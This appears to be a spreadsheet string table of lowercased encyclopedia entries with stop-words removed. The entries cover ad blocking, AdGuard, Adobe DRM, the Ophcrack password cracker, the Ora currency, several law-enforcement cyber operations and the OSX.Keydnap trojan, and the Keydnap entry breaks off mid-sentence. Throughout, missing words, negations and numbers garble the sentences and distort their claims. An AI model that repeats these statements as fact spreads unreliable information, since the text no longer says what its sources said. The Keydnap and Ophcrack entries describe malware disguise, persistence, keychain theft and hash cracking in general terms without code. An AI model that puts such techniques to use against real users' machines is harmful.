    <t>operation protect children (also called operation save children) 2011 joint operation u.s. immigration customs enforcement, u.s. department justice's child exploitation obscenity section asset forfeiture money laundering section execute "seizure warrants domain names websites engaged advertisement distribution child pornography". enforcement action spearheaded ice's cyber crimes center (c3).one domains seized, mooo.com, belonged provider freedns. freedns stated "february 11th around 9:30 mooo.com (the popular shared domain afraid.org) suspended registrar level." 84,000 mooo.com's subdomains subsequently redirected warning stated: this domain name seized homeland security investigations pursuant seizure warrant issued united states district court authority title u.s.c. 2254. advertisement, distribution, transportation, receipt, possession child pornography constitute federal crimes carry penalties first time offenders years federal prison, $250,000 fine, forfeiture restitution. service mooo.com restored february 2011 around 7:15 p.m, although freedns admins noted would take days domain propagation. this meant affected sites would unusable would continue display child pornography accusation.it initially unclear whether entire mooo.com domain shut clerical error intentionally, later apologized seizure stating, "during course joint enforcement operation targeting websites providing explicit child pornographic content, higher level domain name linked sites inadvertently seized period time." excessive seizure criticism doj's parte warrant process possible abuse. also think children censorship notes this article incorporates public domain material united states department homeland security document: john public. "joint dhs-doj "operation protect children" seizes website domains involved advertising distributing child pornography". retrieved 2011-02-18. references</t>
  </si>
  <si>
    <t>Ad blocking</t>
  </si>
  <si>
    <t>blocking filtering software capability blocking altering online advertising browser, application network. this done using browser extensions methods. technologies native countermeasures online advertising exists variety forms, including banners, pictures, animations, embedded audio video, text, pop-up windows, even employ audio video autoplay. many browsers offer ways remove alter advertisements: either targeting technologies used deliver (such embedded content delivered browser plug-ins html5), targeting urls source ads, targeting behaviors characteristic (such html5 autoplay audio video). prevalence mobile desktop blocking software designed remove traditional advertising grew worldwide u.s. 2014 2015. 2015, million americans using blockers. survey research study released 2016, facts reported million americans, 12.8 million adults 13.2 million adults france using blockers pcs, smartphones, tablet computers. march 2016, internet advertising bureau reported blocking already among people years old.as 2021, internet users used blocking software, continued increasing trend since 2014.among technical audiences rate blocking reaches 2021. reasons blocking there various fundamental reasons would want ad-blocking: protecting privacy reduces number http cookies, browser fingerprinting aggressive behavioral tracking techniques protecting malvertising intrusive actions ads, including limited drive-by downloads, invisible overlay click areas (such regular link opens unexpected external website), opening tab, popups auto-redirects. saving bandwidth (and extension, money) websites user tracking advertising code alone constitutes majority downloadable content, thus significantly inflating amount data downloaded user ("web bloat") better user experience some cover text making partly illegible, making site unusable less cluttered pages faster page loading times fewer distractions accessibility reasons motion nauseating users save battery mobile devices laptops prevent undesirable websites making revenue user's visitpublishers representative trade bodies, hand, argue provide revenue website owners, enable website owners create otherwise purchase content website. publishers state prevalent blocking software devices could adversely affect website owner revenue thus, turn, lower availability free content websites. benefits users, benefits blocking software include quicker loading cleaner looking pages fewer distractions, lower resource waste (bandwidth, cpu, memory, etc.), privacy benefits gained exclusion tracking profiling systems delivery platforms. blocking also save substantial amounts electrical energy lower users' power bills, additional energy savings also expected grid level fewer data packets need transmitted user's machine website server. user experience blocking software benefits users' quality life, decreases internet users' exposure advertising marketing industries, promote purchase numerous consumer products services potentially harmful unhealthy creating urge immediately. average person sees 5000 advertisements daily, many online sources. promise viewers lives improved purchasing item promoted (e.g., fast food, soft drinks, candy, expensive consumer electronics) encourages users debt gamble. additionally, internet users items, packaging containers case candy soda pop) disposed leading negative environmental impacts waste disposal. advertisements carefully crafted target weaknesses human psychology; such, reduction exposure advertisements could beneficial users' quality life. unwanted advertising also harm advertisers users become annoyed ads. irritated users might make conscious effort avoid goods services firms using annoying "pop-up" block content user trying view. users interested making purchases, blocking also save time. appears website exerts toll user's "attention budget" since enters user's field view must either consciously ignored closed, dealt way. user strongly focused reading solely content seeking likely desire diverted advertisements seek sell unneeded unwanted goods services. contrast, users actively seeking items purchase, might appreciate advertising, particular targeted ads. security another important aspect improving security; online advertising subjects users higher risk infecting devices computer viruses surfing pornography websites. high-profile case, malware distributed advertisements provided youtube malicious customer google's doubleclick. august 2015, 0-day exploit firefox browser discovered advertisement website. when forbes required users disable blocking viewing website, users immediately served pop-under malware. australian signals directorate recommends individuals organizations block advertisements improve information security posture mitigate potential malvertising attacks machine compromise. information security firm webroot also notes employing blockers provide effective countermeasures malversating campaigns less technically-sophisticated computer users. monetary blocking reduces page load time saves bandwidth users. users total transferred bandwidth ("capped" pay-for-usage connections) including mobile users worldwide direct financial benefit filtering loaded. using blocker common method improving internet speeds. analysis popular news sites ranked alexa) 2015 showed mozilla firefox tracking protection lead reduction data usage median reduction page load time. according research performed york times, blockers reduced data consumption sped upload time half news sites, including own. journalists concluded "visiting home page boston.com (the site data study) every month would cost equivalent $9.50 data usage ads".it known problem browsers, including firefox, restoring sessions often plays multiple embedded once. however, annoyance easily averted simply setting browser clear cookies browsing-history information time browser software closed. another preventive option script blocker, enables user disable scripts selectively re-enable certain scripts desired, order determine role script. user thus quickly learn scripts truly necessary (from standpoint webpage functionality) consequently sources scripts undesirable, insight helpful visiting websites general. thus precisely controlling scripts webpage viewed, user retains full control happens computer computer screen. methods method filtering simply block prevent auto play flash animation image loading microsoft windows audio video files. this done browsers easily also improves security privacy. this crude technological method refined numerous browser extensions. every browser handles task differently, but, general, alters options, preferences application extensions filter specific media types. additional add-on usually required differentiate non-ads using technology, wanted unwanted behaviors. advanced ad-blocking filter software allows fine-grained control advertisements features blacklists, whitelists, regular expression filters. certain security features also effect disabling ads. some antivirus software blocker. filtering intermediaries providers national governments increasingly common. browser integration 2015, many browsers block unsolicited pop-up automatically. current versions konqueror, microsoft edge, firefox also include content filtering support out-of-the-box. content filtering added firefox, chromium-based browsers, opera, safari, browsers extensions adblock, adblock plus, ublock origin, number sources provide regularly updated filter lists. adblock plus included freeware browser maxthon people's republic china default. another method filtering advertisements uses cascading style sheets (css) rules hide specific html xhtml elements. january 2016, brave, free, ad-blocking browser mac, android, devices launched. brave users optionally enable brave's network earn basic attention tokens (bats), type cryptocurrency, sent micro-payments publishers.at beginning 2018, google confirmed built-in blocker chrome/chromium browsers would live february: blocker blocks certain specified better standard (defined coalition better ads, google board member). this built-in blocking mechanism disputed could unfairly benefit google's advertising itself.in 2019, apple google began make changes browsers' extension systems encourage declarative content blocking using pre-determined filters processed browser, rather filters processed runtime extension. both vendors imposed limits number entries included lists, (especially case chrome) allegations changes made inhibit effectiveness blockers. external programs number external software applications offer filtering primary additional feature. traditional solution customize http proxy proxy) filter content. these programs work caching filtering content displayed user's browser. this provides opportunity remove also content offensive, inappropriate, even malicious (drive-by download). popular proxy software blocks content effectively include netnanny, privoxy, squid, content-control software. main advantage method freedom implementation limitations (browser, working techniques) centralization control (the proxy used many users). proxies good filtering ads, several limitations compared browser-based solutions. proxies, difficult filter transport layer security (ssl) (https://) traffic full webpage context available filter. well, proxies find difficult filter javascript-generated content. hosts file manipulation most operating systems, even aware domain name system (dns), still offer backward compatibility locally administered list foreign hosts. this configuration, historical reasons, stored flat text file default contains hostnames associated addresses. editing hosts file simple effective clients read local hosts file querying remote server. storing black-hole entries hosts file prevents browser accessing server manipulating name resolution server local nonexistent address (127.0.0.1 0.0.0.0 typically used ipv4 addresses). while simple implement, methods circumvented advertisers, either hard-coding, address server hosts (this, turn, worked around changing local routing table using example iptables blocking firewalls), loading advertisements server serves main content; blocking name resolution server would also block useful content site. using sinkhole manipulating hosts file exploits fact operating systems store file address, domain name pairs consulted browsers using server look domain name. assigning loopback address known server, user directs traffic intended reach server local machine virtual black hole /dev/null bucket. filtering advertising blocked using server configured block access domains hostnames known serve spoofing address. users choose already modified server dedicated device running adequate software raspberry running pi-hole themselves. manipulating widely employed method manipulate end-user sees internet also deployed locally personal purposes. china runs root considered same. google required google public used applications android devices. accordingly, addresses/domains used advertising extremely vulnerable broad form substitution whereby domain serves entirely swapped serving local subset users. this especially likely countries, notably russia, india china, advertisers often refuse clicks page views. dns-level blocking domains non-commercial reasons already common china. recursive local android, apps local connection host filtering ability address without requiring root access. this approach allows blocking download blocking host files filter networks throughout device. adguard, blokada, dns66, rethinkdns popular apps accomplish blocking without root permission. blocking active local turned completely stops connection disconnected. convenience makes easy access content blocked anti-adblock scripts. this approach optimizes battery usage, reduces internet slowdown caused using external blocking needs overall less configuration. hardware devices devices adtrap pihole hardware block internet advertising. based reviews adtrap, device uses linux kernel running version privproxy block video streaming, music streaming, browser, pihole local block advertisement servers, stopping connected devices showing ads. another solution provided network-level blocking telcos israeli startup shine. external parties internet providers internet providers, especially mobile operators, frequently offer proxies designed reduce network traffic. even targeted specifically filtering, proxy-based arrangements block many types advertisements large bandwidth-consuming, otherwise deemed unsuited specific internet connection target device. many internet operators block form advertisements time injecting promoting services specials. economic consequences online business some content providers argued widespread blocking results decreased revenue website sustained advertisements e-commerce-based businesses, blocking detected. some argued since advertisers ultimately paying increase revenues, eliminating blocking would dilute value impression drive price advertising, arguing like click fraud, impressions served users blockers little value advertisers. consequently, argue, eliminating blocking would increase overall revenue content providers long run. business models tools help block work different business models stay operation: free open source: several tools work foss model, powered community contributions donations, e.g. ublock origin whitelisting: companies resorted maintaining whitelist share revenue allow "acceptable ads". this faced criticism, adblock plus subscription/upfront: some companies field started subscription upfront payment model tools, e.g. wipr freemium: other companies offer level service free charge additional features, e.g. adguard response publishers countermeasures some websites taken countermeasures blocking software, attempting detect presence blockers informing users views, outright preventing users accessing content unless disable blocking software, whitelist website, "ad-removal pass". there several arguments supporting opposing assertion blocking wrong. indeed, evidence show countermeasures hurt website's performance, users unwilling turn adblock, instead competitor's website listed search results. little amount time user spends website, greater time spent competitor's, search engines view webpage less favourably reduce search ranking. back-and-forth elevation technologies used ad-blocking countering ad-blocking equated blocking war" "arms race" parties.it suggested european union, practice websites scanning blocking software afoul e-privacy directive. this claim validated europe's guidelines released june 2016 stating indeed legal issue blocker detection. while anti-blocking stakeholders tried refute seems safe assume publishers follow guidelines provided main publisher lobby iab. joint effort announced sweden prior europe's guideline matter never materialized, would likely found european anti-competition laws did.in august 2017, vendor, admiral, counter-measures issued demand section 1201 u.s. digital millennium copyright act, demand removal domain name associated service ad-blocking filter list. vendor argued domain constituted component technological protection measure designed protect copyrighted work, thus made violation anti-circumvention frustrate access alternatives 2015, advertisers marketers look involve brands directly entertainment native advertising product placement (also known brand integration embedded marketing). example product placement would soft drink manufacturer reality show producer show's cast host appear onscreen holding cans soft drink. another common product placement automotive manufacturer give free cars producers show, return show's producer depicting characters using vehicles show. some digital publications turned customers help form jar. example, guardian asking readers donations help offset falling advertising revenue. according newspaper's editor-in-chief, katharine viner, newspaper gets amount money membership donations advertising. newspaper considered preventing readers accessing content usage ad-blocking software becomes widespread, keeps content accessible readers employ ad-blockers. service called scroll, launched january 2020, worked several leading website publishers create subscription model ad-free browsing across supported websites. users would scroll directly, portions subscription fees doled websites based proportional view count. also references</t>
  </si>
  <si>
    <t>Adobe Digital Editions</t>
  </si>
  <si>
    <t>adobe digital editions (abbreviated ade) e-book reader software program adobe systems, built initially (1.x version) using adobe flash. used acquiring, managing, reading e-books, digital newspapers, digital publications. software supports epub (nonproprietary file format reflowable text, fixed layout e-books; respectively). implements proprietary scheme digital rights management (drm) which, since version release 2008, allows document sharing among multiple devices user authentication adobe digital editions successor acrobat ebook reader application.windows versions adobe digital editions released june 2007. current apple version star rating. previous versions software required version adobe flash player. starting version 2.0, however, relies .net framework windows, flash player longer supported. adobe initiated development linux version 2007; however, beta release formal updates. digital rights management adobe digital editions uses proprietary adept (adobe digital experience protection technology) digital rights management scheme, also implemented e-book readers, including ipads many android devices, kindles. software locks content machines allows user view content them. barnes noble (b&amp;n) e-books protected variant adept.in march 2009, author reverse engineering blog i♥cabbages announced broken scheme.when viewing e-book, adobe digital editions default stores e-book locally files windows machines. these files copied handled like files, cannot opened except adobe digital editions. adobe's website virtually information adept except trademark page statement overdrive compatible. data collection concern october 2014, nate hoffelder reported digital reader adobe digital editions version ("ade4") sending extensive information e-books back adobe, including e-books read user well e-books stored machine opened ade4. this confirmed sean gallagher, writing technica others. however, else confirmed report books never opened library logged. hoffelder reported information collected included "[which] ebooks opened, pages read, order... including title, publisher, metadata book". also reported data sent clear text—that protected form encryption. this would make easy third party read information. this data collected borrowed library books books protected form drm. hoffelder suggested practice might violate various privacy laws. electronic frontier foundation (eff) made similar suggestion.adobe responded practice justified license agreement denied collecting data book currently opened reading. specifically, stated: "all information collected user collected solely purposes license validation facilitate implementation different licensing models publishers. additionally, information solely collected ebook currently read user ebook user’s library read/available reader. user privacy important adobe, data collection adobe digital editions line user license agreement adobe privacy policy." gary price, writing infodocket online publication sponsored library journal), views matter serious concern, sees another instance concerns present largely unaddressed years. article also posts adobe's response issue. october 2014, adobe released version 4.0.1 software, sends data adobe secure transmission (using https). also adobe content server calibre (software) digital library international digital publishing forum overdrive media console public library sigil (application) references external links official website</t>
  </si>
  <si>
    <t>AdGuard</t>
  </si>
  <si>
    <t>developed adguard software limited, adguard open-source, free, shareware products. adguard's supports microsoft windows, linux, macos, android ios. adguard downloaded browser extension.adguard software limited founded 2009 moscow. 2014 adguard software limited's products became available cyprus headquarters subsequently moved. features adguard features include: adguard home adguard home acts recursive resolver, responds invalid address domains appear filter lists quests. similar pi-hole. adguard browser extensions browser extension blocks video ads, interstitial ads, floating ads, pop-ups, banners, text ads. there possibility handle anti-adblock scripts. product also blocks spyware warns users malicious websites. adguard content blocker additional browser extension browsers yandex browser samsung internet, uses content blocker api. downloads filter list updates asks browsers enforce content blocker api. adguard applications adguard windows versions, well native mobile versions android ios. application sets local vpn, filters traffic mobile device. adguard adguard operates recursive name servers public use. adguard supports encryption technologies, including dnscrypt, https, tls, dns-over-quic. adguard began testing service back 2016, officially launched 2018. reception while company's products earned positive feedback industry publications, series policies google apple stores occurred 2014 2018, impeded user access adguard's mobile applications. macworld mentioned adguard list five "best adblockers ios".in april 2020, android central stated adguard uses little processing power thing ublock origin", "the best all-in-one blocking tool someone want extension" blocks cryptomining. however, android central recommended ublock origin dedicated cryptomining blocker adguard. incidents distribution adguard's android discontinued google play 2014. nevertheless still updated made available download developers’ website. adguard received updates summer 2018 summer 2019 apple policies time blocking apis. september 2018, adguard credential stuffing attack. adguard claims servers compromised instead attackers used credential pairs reused victims sites stolen sites. according company spokesperson, know accounts exactly accessed attackers", company reset passwords accounts precautionary measure". also, adguard pledged "have been pwned?" check passwords appearance known public data leaks. furthermore, implemented strict password security requirements.in november 2020, microsoft edge store chrome store infiltrated fraudulent add-ons posing various legitimate browser add-ons, including nordvpn adguard's add-on. subsequently microsoft google alerted actions taken remove imposter add-ons various browser stores. research adguard developers taken research order inform wider audiences user privacy, cybersecurity data protection. following issues notable cases involving developers: top-ranked websites involved cryptojacking facebook network widespread distribution alerting reporting fake adblockers popular android privacy issues references</t>
  </si>
  <si>
    <t>Ophcrack</t>
  </si>
  <si>
    <t>ophcrack free open-source (gpl licensed) program cracks windows log-in passwords using hashes rainbow tables. program includes ability import hashes variety formats, including dumping directly files windows. computers, ophcrack crack passwords within minutes.rainbow tables hashes provided free developers. default, ophcrack bundled tables allow crack passwords longer characters using alphanumeric characters. available free download four windows tables four windows vista tables.objectif sécurité even larger tables purchase intended professional use. larger rainbow tables ntlm hash cracking windows vista/windows 7.ophcrack also available live distributions, automates retrieval, decryption, cracking passwords windows system. live distribution available windows lower another windows vista windows live distributions ophcrack built slitaz gnu/linux. starting version 2.3, ophcrack also cracks ntlm hashes. this necessary generation hash disabled (this default windows vista) password longer characters case hash stored). starting version 3.7.0, source code moved sourceforge gitlab. also aircrack-ng cain abel crack davegrohl hashcat john ripper l0phtcrack rainbowcrack nmap references external links official website ophcrack online demo form submit hashes instantly crack passwords ophcrack table found ophcrack says tables found". ophcrack livecd tutorial quick ophcrack work ophcrack (the time-memory-trade-off-cracker) école polytechnique fédérale lausanne</t>
  </si>
  <si>
    <t>Operation Shrouded Horizon</t>
  </si>
  <si>
    <t>operation shrouded horizon 18-month international enforcement investigation culminating july 2015 seizure darkode, online cybercrime forum black market, arrest several members. case involved enforcement agencies countries, united states federal bureau investigation (fbi) assistance europol, called "the largest-ever coordinated enforcement effort directed online cyber criminal forum".law enforcement agents gained access invite-only website undisclosed means collected information extended period, leading equipment seizures, searches, arrests individuals globally, leading indictments crimes including computer fraud, conspiracy commit computer fraud, conspiracy commit wire fraud, conspiracy commit money laundering, conspiracy send malicious code, spamming, identity theft, racketeering, conspiracy commit bank fraud, extortion, conspiracy commit access device fraud. among arrested administrators darknet market therealdeal, also active darkode.upon announcing charges, united states attorney david hickton called site cyber hornet's nest criminal hackers" "represented gravest threats integrity data computers united states". though assisted europol, reports credit agencies countries: australia, bosnia herzegovina, brazil, canada, colombia, costa rica, cyprus, croatia, denmark, finland, germany, israel, latvia, macedonia, nigeria, romania, serbia, sweden, united kingdom, united states.only weeks announcement raid, site reappeared increased security, employing bitcoin-based blockchain authentication operating anonymity network. references</t>
  </si>
  <si>
    <t>Operation Site Down</t>
  </si>
  <si>
    <t>operation site down umbrella name enforcement initiative conducted united states' enforcement agents countries resulted raid targets june 2005. three separate undercover investigations involved, based chicago, charlotte jose. raid consisted approximately searches u.s. approximately others countries effort disrupt dismantle many leading warez groups distribute trade copyrighted software, movies, music games internet.on february 2006, u.s. attorney's office patrick fitzgerald announced indicting nineteen members risciso, software movie infringement ring, u.s. district court chicago. lead prosecutor government case assistant u.s. attorney pravin rao.up 2008, convictions result ongoing investigation. part plea agreement, defendant agreed forfeit equipment seized federal search warrants executed june 2005. undercover agent, went alias griffen created california gigabit sites (located hurricane electric): chud chirayu patel (nebula), member boozers, becomes siteop chud hosted fremont, california (which patel resides). patel, friends sources, acquired major groups affiliates centropy (the divine alcoholics) topsites. over years chud online, collected copyright infringement providers. able patel's address sent griffen motorcycle stunt dvds mail gave return address envelope centropy leader, went alias 'marvel' 'cartel', arrested indiana. centropy herbie release server pre'd, meaning even though herbie release released raids, already available topsites. sentences mark carter (a.k.a. burner), upland, california, sentenced months' imprisonment, ordered $34,964 restitution. judge whyte also sentenced defendant three-year period supervised release. december 2005, carter pleaded guilty count violating count conspiracy commit criminal copyright infringement. defendant began serving sentence october 2006. ryan zeman, rohnert park, california, sentenced three years' probation, four months' home confinement, four months' community confinement, required $120,000 restitution. october 2005, zeman pleaded guilty violating act, u.s.c. 506(a)(1)(b) u.s.c. 2319(c)(1), aiding abetting. gregory dickman, wilmington, north carolina, sentenced months' home confinement, three years probation ordered $31,515 restitution. april 2006, dickman pleaded guilty conspiring commit criminal copyright infringement violation u.s.c. violating act, u.s.c. 506(a)(1)(b) u.s.c. 2319(c)(1), aiding abetting. johnny russell, spring, texas, sentenced months community confinement facility, three years probation, ordered $11,508 restitution. april 2006, russell pleaded guilty conspiring commit criminal copyright infringement violation u.s.c. violating act, u.s.c. 506(a)(1)(b) u.s.c. 2319(c)(1), aiding abetting. similarities scene miniseries online film series titled scene fictional take actual bootlegging scene. some claims made coincidences series actual events. main character brian sandro, student, also infringes hollywood movies spare time. sandro heads movie release group, cpx. episode nine, released beginning june 2005, sandro, whose alias drosan, messaged member named gryffin. gryffin earlier looking members different channel. gryffin's friend's father apparently works film studio gryffin asking supplier cpx. gryffin character scene comes little mysterious, otherwise harmless. however, pointed name similar nickname actual lead agent, griffen, responsible busts operation site down. also, messaging session drosan gryffin, music playing background periodically says works fbi" trancelike fashion. productions, creators scene, deny accounts insider information arrests similarities coincidences. however, according slyck posting, gryffin character griffen agent shared the.yankees-suck.net. vhost resolves hurricane electric, location topsites: chud lad. furthermore, bruce forrest, quoted wired article self-proclaimed "double agent", active correspondent scene series. while productions claim forrest involvement ninth episode supposedly left terms eighth episode), speculate could elaborate warning forrest impending federal arrests. also operation buccaneer operation fastlink operation d-elite references external links 'operation site down' attacks organized piracy networks countries, press release department justice (june 2005) first "operation site down" indictment charges four defendants copyright violations following undercover "warez" investigation, press release department justice (july 2005). justice department announces eight charged internet piracy crackdown, press release department justice (july 2005) defendant indicted camcording films movie theaters distributing films computer networks, press release department justice salisbury charge (august 2005) first guilty plea federal prohibiting camcording films movie theaters missouri theater employee first conviction "operation copycat", press release department justice salisbury plea (september 2005) second guilty plea connection operation copycat, press release department justice zeman plea (october 2005) five defendants charged internet-based movie piracy, plus software games piracy, press release department justice (november 2005) convictions date internet-based piracy movies, software games operation copycat, press release department justice (january 2006) additional defendants charged violating copyright laws part operation copycat, press release department justice (january 2006) indicted $6.5 million "risciso" software piracy conspiracy, press release department justice (february 2006) five additional defendants charged violating copyright laws, press release department justice (april 2006) press release thirtieth copyright conviction part operation copycat includes film critic admitted selling over movies illegal distribution. third conviction camcording movies theater</t>
  </si>
  <si>
    <t>Operation Sundevil</t>
  </si>
  <si>
    <t>operation sundevil 1990 nationwide united states secret service crackdown "illegal computer hacking activities." involved raids approximately fifteen different cities resulted three arrests confiscation computers, contents electronic bulletin board systems (bbses), floppy disks. revealed press release 1990. arrests subsequent court cases resulted creation electronic frontier foundation. operation seen largely public-relations stunt. operation sundevil also viewed preliminary attacks legion doom similar hacking groups. raid steve jackson games, court case steve jackson games, inc. united states secret service, often attributed operation sundevil, electronic frontier foundation states unrelated cites attribution media error.the name comes devil stadium arizona state university, near local secret service headquarters investigation raids coordinated. background prior 1990, people manipulated telecommunication systems, known phreakers, generally prosecuted within united states. majority phreakers used software obtain calling card numbers built simple tone devices order make free telephone calls. small elite, highly technical segment phreakers interested information inner workings telecommunication system making free phone calls. phone companies complained financial losses phreaking activities. switch analog digital equipment began expose inner workings telephone companies hackers began explore switches trunks. lack laws expertise part american enforcement, cases hackers prosecuted operation sundevil.however, starting 1989, secret service (usss), given authority congress deal access device fraud extension wire fraud investigations title 1029), began investigate. over course 18-month-long investigation, usss gathered alleged evidence rampant credit card calling card fraud state lines.operation sundevil allowed multiple federal enforcement agencies, particularly secret service fbi, gain valuable expertise fighting form criminal activity well expanding agencies' budgets. laws created allow federal prosecutors charge individuals accused phreaking, hacking, wire, credit card fraud. evidence gained operation sundevil allowed enforcement convince united states congress need additional funding, training, overall expansion. action along chicago task force arizona organized crime racketeering bureau, operation involved raids austin, plano, cincinnati, detroit, angeles, miami, york, newark, phoenix, pittsburgh, richmond, tucson, diego, jose, francisco, seattle. raids centered arizona, press conference occurred.raids generally took place middle-class suburbs targeted credit card thieves telephone abusers. they carried local police, secret service agents, cia. twenty-seven search warrants, resulting three arrests, issued executed 1990. police also took around computers approximately bbses, including infamous elite hacking bbss world time, cloud nine. this largest crackdown electronic bulletin boards world history. finally, 23,000 floppy disks also seized. these held variety data, including software, phreaking hacking tools, tens thousands credit card details, plethora illegal copyrighted material. three people arrested "tony trashman," "dr. ripco," "electra."other parts operation targeted underground ezine phrack, published contents proprietary text file copied bellsouth computers containing information e911 emergency response system, although later made null court case proven information e911 system also provided public mail-order catalog. aftermath press release 1990, officials federal government arizona state government revealed secret service involved investigation. assistant director secret service, garry jenkins, commented press release that, "the secret service sending clear message computer hackers decided violate laws nation mistaken belief successfully avoid detection hiding behind relative anonymity computer terminals."two public-access computer systems shut days following operation: at&amp;t unix system dallas, texassdf jolnet system lockport, illinois. neither linked operation, however. at&amp;t spokesman claimed shutdown result internal investigation related operation.in response arrests, electronic frontier foundation founded mitchell kapor, founder lotus development corporation, john perry barlow, author. foundation hired lawyers represent hackers cases arising operation sundevil.operation sundevil publicized action federal government hackers. part this, seen public-relations stunt message hackers. while little overall damage hacking community long run, stop illicit hacking activities many best hackers world short period time, lauded tactical success surprise damage caused communities comparison long wars waged legion doom. however, also criticized failure several unsuccessful prosecutions, number raids even leading arrest. also operation cybersnare hacker crackdown references</t>
  </si>
  <si>
    <t>Operation Tangled Web</t>
  </si>
  <si>
    <t>operation tangled name raid conducted 2007 u.s. immigration customs enforcement part crackdown modchips copyright circumvention devices. these devices allowed third-party software unauthorized copies video games played video game systems. agents raided businesses homes distributed used devices. copyright circumvention devices arguably modchips violation digital millennium copyright act. raid locations raids carried u.s. states. states california, florida, hawaii, idaho, illinois, maryland, massachusetts, michigan, minnesota, york, north carolina, ohio, pennsylvania, south carolina, texas wisconsin. names businesses individuals raided released. reactions entertainment software association commended work u.s. enforcement agents prosecutors made raid possible. nintendo game publishers claimed lost million usd, sought help enforcement agents crack unlicensed video game distribution. their efforts resulted 61,000 modchips seized worldwide. modding community's response typically function device legitimate uses illegalize entire device especially "the circumvention copy protection mechanisms" legitimate uses archiving legally purchased media. references</t>
  </si>
  <si>
    <t>Operation Torpedo</t>
  </si>
  <si>
    <t>operation torpedo 2011 operation federal bureau investigation (fbi) compromised three different hidden services hosting child pornography, would target anyone happened access using network investigative technique (nit). operation started dutch enforcement compromised hidden service called pedoboard, found physically located nebraska hosting company. ensuing investigation found employee, aaron mcgrath, operating child pornography sites work home. after year surveillance, arrested mcgrath took control three sites (pedoboard, pedobook, tb2) two-week period starting november 2012. during time websites modified serve nit, would attempt unmask visitors revealing address, operating system browser. successful revealing approximately domestic users well numerous foreign users. code revealed part case cottom researchers university nebraska kearney dakota state university reviewed code found adobe flash application would ping user's real address back controlled server, rather routing traffic network protecting identity. used technique metasploit's "decloaking engine" affected users updated browser. investigation daily claimed created former part-time employee project vidalia developer matthew edman internally known "cornhusker".the u.s. department justice noted december 2015 besides mcgrath, users united states convicted result operation. user caught accessed site nine minutes since wiped computer, month-later police search home digital devices found—through digital forensics—image thumbnails indicating past presence downloaded child pornography, well text instructions accessing downloading child pornography. another user unmasked messages undercover agent, user turned timothy defoggi, time acting director cybersecurity u.s. department health human services. also freedom hosting operation pacifier references</t>
  </si>
  <si>
    <t>Operation Tovar</t>
  </si>
  <si>
    <t>operation tovar international collaborative operation carried enforcement agencies multiple countries gameover zeus botnet, believed investigators used bank fraud distribution cryptolocker ransomware.participants include u.s. department justice, europol, u.k. national crime agency, south african police service, together number security companies academic researchers, including dell secureworks, deloitte cyber risk services, microsoft corporation, abuse.ch, afilias, f-secure, level communications, mcafee, neustar, shadowserver, anubisnetworks, symantec, heimdal security, sophos trend micro, academic researchers carnegie mellon university, georgia institute technology, university amsterdam saarland university.other enforcement organizations involved include australian federal police; national police netherlands' national high tech crime unit; european cybercrime centre (ec3); germany’s bundeskriminalamt; france’s police judiciaire; italy’s polizia postale delle comunicazioni; japan’s national police agency; luxembourg’s police grand ducale; zealand police; royal canadian mounted police; ukraine’s ministry internal affairs' division combating cyber crime. defense criminal investigative service u.s. department defense also participated investigation.in early june 2014, u.s. department justice announced operation tovar temporarily succeeded cutting communication gameover zeus command-and-control servers.the criminals attempted send copy database safe location, intercepted agencies already control part network. russian evgeniy bogachev, "lucky12345" "slavik", charged ringleader gang behind gameover zeus cryptolocker. database indicates scale attack, makes decryption cryptolocked files possible. august 2014 security firms involved shutdown, fox-it fireeye, created portal, called decrypt cryptolocker, allows 500,000 victims find unlock files. victims need submit encrypted file without sensitive information, allows unlockers deduce encryption used. possible cryptolocked files decrypted, files encrypted different ransomware.analysis data became available network taken indicated 1.3% infected paid ransom; many able recover files backed others believed lost huge amounts data. nonetheless, gang believed extorted us$3m. also cutwail botnet conficker command control (malware) gameover zeus timeline computer viruses worms tiny banker trojan torpig zeus (malware) zombie (computer science) references</t>
  </si>
  <si>
    <t>Adobe Content Server</t>
  </si>
  <si>
    <t>adobe content server software developed adobe systems digital rights management e-books. designed protect distribute adobe e-books epub format adobe digital editions, applications devices developed using adobe's adobe reader mobile sdk, covering wide range tablets, smartphones, dedicated devices. adobe content server also works conjunction adobe digital experience protection technology (adept), adobe's digital rights management scheme. also digital library public library online shopping publishing adobe digital editions references</t>
  </si>
  <si>
    <t>Ora (currency)</t>
  </si>
  <si>
    <t>(symbol:φ, [ˈʊə.ra]) local currency orania, afrikaner whites-only town south africa first issued april 2004. pegged south african rand. name, recalling town circulates, derives latin aurum, meaning "gold". currency sanctioned south african reserve bank. history idea originated 2002, professor johan argued community intended empower access many instruments possible, including currency. first notes issued april 2004 provide internal currency orania part goal create independent afrikaner state known volkstaat. before launch, south african reserve bank cautioned items produced could resemble rand notes, south african law.it printed denominations ora. note depicts afrikaner history, notes afrikaner art; notes afrikaner culture; note orania itself. each note also advertises local business.to encourage use, stores orania offer discount items purchased ora. local banking institution, orania spaar- kredietkoöperatief, charge initiative. rands exchanged bank par. bank profits gaining interest rand obtained. initiative supported south african reserve bank.the payment method also effect discouraging theft, used within orania. about r400,000 r580,000 worth oras circulation 2011. notes printed every three years replace ones worn use. dora 2021, orania released first implementation called dora. dora digital copy added benefits, electronic payments. dora replace physical notes, supplement already exist. additionally, unlike ora, dora expiry date. orania technology group, local based association, lead development digitization ora. also volkstaat afrikaner nationalism references external links mears, ronald. "the facilitator sustainable local economic development orania". archived original 2015-04-16. retrieved 2015-04-12.</t>
  </si>
  <si>
    <t>OSX.Keydnap</t>
  </si>
  <si>
    <t>osx.keydnap macos based trojan horse steals passwords icloud keychain infected machine. uses dropper establish permanent backdoor exploiting macos vulnerabilities security features like gatekeeper, icloud keychain file naming system. first detected early july 2016 eset researchers, also found distributed compromised version transmission torrent client. technical details download installation osx.keydnap initially downloaded archive. this archive contains single mach-o file resource fork containing icon executable file, typically jpeg text file image. additionally, dropper takes advantage handles file extensions putting space behind extension file name example “keydnap.jpg instead “keydnap.jpg”. usually commonly seen icon images names used exploit users' willingness click benign looking files. when file opened, mach-o executable runs default terminal instead image viewer like user would expect. this initial execution three things. first, downloads executes backdoor component. second, downloads opens decoy document match dropper file pretending finally, quits terminal cover ever open. terminal opened momentarily. establishing backdoor connection since downloader persistent, downloaded backdoor component spawns process named "icloudsyncd" runs times. also adds entry launchagents directory survive reboots. icloudsyncd process used communicate command control server onion.to address, establishing backdoor.it attempts capture passwords icloud keychain, using proof-of-concept keychaindump, transmits back server. keychaindump reads securityd’s memory searches decryption user’s keychain described “keychain analysis memory forensics” koo. gatekeeper signing workaround uses gatekeeper verify application signed valid apple developer certificate preventing osx.keydnap running. further, even user gatekeeper turned off, warning file application downloaded internet giving user option execute application. however, packing osx.keydnap legitimate signing case compromised transmission 